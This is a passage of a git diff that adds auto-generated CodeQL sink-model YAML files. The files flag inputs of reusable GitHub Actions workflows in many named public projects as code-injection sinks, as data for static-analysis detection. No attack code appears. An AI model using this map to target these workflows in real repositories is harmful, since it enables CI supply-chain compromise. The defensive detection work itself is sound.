"inputs.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml new file mode 100644 index 00000000000..43f5349bf3c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "inputs.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml new file mode 100644 index 00000000000..d6ef60a9698 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "inputs.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.display", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.matrix-jobs-count", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml new file mode 100644 index 00000000000..1d41854bf71 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.common-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.xml-dump-type-sizes", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.tests", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.docs", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.extras", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.stonesense", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.platform-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.launchdf", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.gcc-ver", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml new file mode 100644 index 00000000000..9f64a59aead --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.id", "code-injection", "generated"] + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml new file mode 100644 index 00000000000..69cb39e5e55 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml new file mode 100644 index 00000000000..a66e2a2cca5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.TARGET_NAME", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.TEST_TARGET", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY_COMPOSE", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml new file mode 100644 index 00000000000..ca3eeca8df7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml new file mode 100644 index 00000000000..b95ce03ed3a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml new file mode 100644 index 00000000000..326d4391ecb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "inputs.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml new file mode 100644 index 00000000000..849a531cd7b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.config", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml new file mode 100644 index 00000000000..835bbf4cf89 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml new file mode 100644 index 00000000000..453c3cd06f3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "inputs.arch", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.scenario", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml new file mode 100644 index 00000000000..32e6124c06e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "inputs.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml new file mode 100644 index 00000000000..09177714b08 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "inputs.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml new file mode 100644 index 00000000000..78243b4c6d7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml new file mode 100644 index 00000000000..6e69fb89fc8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "inputs.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml new file mode 100644 index 00000000000..fee19d65a09 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.aws_s3_cp_extra_args", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.s3_path", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.pypirc", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.cuda_short_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.torch_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "inputs.pre-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml new file mode 100644 index 00000000000..51b58ab74f5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.build_type", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.arch", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.bucket_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml new file mode 100644 index 00000000000..5a53b788312 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml new file mode 100644 index 00000000000..579e295213b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml new file mode 100644 index 00000000000..bc8133b907c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.test_timeout", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.log_level", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.bin_name", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.has_ffi", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml new file mode 100644 index 00000000000..232c6abb3f3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.triggered_by_callable", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.package_version_number", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.base_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.cpp_release_version", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.platforms", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.runIntegrationTests", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.working_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.release_label", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.create_new_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "inputs.apis", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml new file mode 100644 index 00000000000..8a7d3c60c45 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "inputs.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml new file mode 100644 index 00000000000..a1e523d92ce --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "inputs.unstable", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml new file mode 100644 index 00000000000..22729c980de --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "inputs.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml new file mode 100644 index 00000000000..e242d38bdbe --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "inputs.before-build", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "inputs.component", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "inputs.component", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml new file mode 100644 index 00000000000..f9c6658f5b8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.org", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.solution", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.compose-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml new file mode 100644 index 00000000000..798c6bcc37a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "inputs.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml new file mode 100644 index 00000000000..687db46824a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.output-path", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.settings", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.requirements", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml new file mode 100644 index 00000000000..8a13569af7c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "inputs.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml new file mode 100644 index 00000000000..453eb862b94 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.panaThreshold", "code-injection", "generated"] + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml new file mode 100644 index 00000000000..37074688f17 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "inputs.target", "code-injection", "generated"] + - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml new file mode 100644 index 00000000000..2e1835cadca --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "inputs.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml new file mode 100644 index 00000000000..924f5eb157c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 00000000000..1244f76cbf1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml new file mode 100644 index 00000000000..94c6c81d33e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.path", "code-injection", "generated"] + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git 